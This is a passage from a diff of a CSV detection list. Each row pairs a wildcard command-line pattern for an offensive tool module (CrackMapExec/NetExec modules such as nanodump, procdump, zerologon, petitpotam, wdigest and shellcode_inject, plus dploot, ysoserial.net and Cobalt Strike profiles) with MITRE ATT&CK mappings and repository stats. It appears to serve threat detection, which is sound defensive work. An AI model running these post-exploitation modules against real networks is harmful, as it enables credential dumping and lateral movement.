tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M nanodump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -m olecmd -o *powershell *","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" -"* -M pe_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M petitpotam *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M petitpotam*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M printnightmare *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -m privileged-users --full *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M procdump ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M pe_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M petitpotam *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M petitpotam*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M printnightmare *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -m privileged-users --full *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M procdump ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -m rdrleakdiag -M masterkeys*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" -"* -m run_command -c *.exe*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* -M runasppl *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M scuffy -o SERVER=127.0.0.1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M scuffy*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M shadowcoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M shadowcoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M shellcode_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M slinky","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M slinky -o SERVER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M spider_plus *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M spider_plus -o MAX_FILE_SIZE=100*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M teams_localdb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M tokens*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M uac","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -m run_command -c *.exe*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -M runasppl *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M scuffy -o SERVER=127.0.0.1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M scuffy*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M shadowcoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M shadowcoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M shellcode_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M slinky","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M slinky -o SERVER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M spider_plus *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M spider_plus -o MAX_FILE_SIZE=100*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M teams_localdb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M tokens*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M uac","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* -m venv csexec *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* -M wdigest -o ACTION=disable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M wdigest -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M web_delivery*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M zerologon *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M wdigest -o ACTION=disable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M wdigest -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M web_delivery*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M zerologon *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* m3-gen.py *","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" -"* malleable.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"* malleable.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "* malleable-c2-randomizer*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 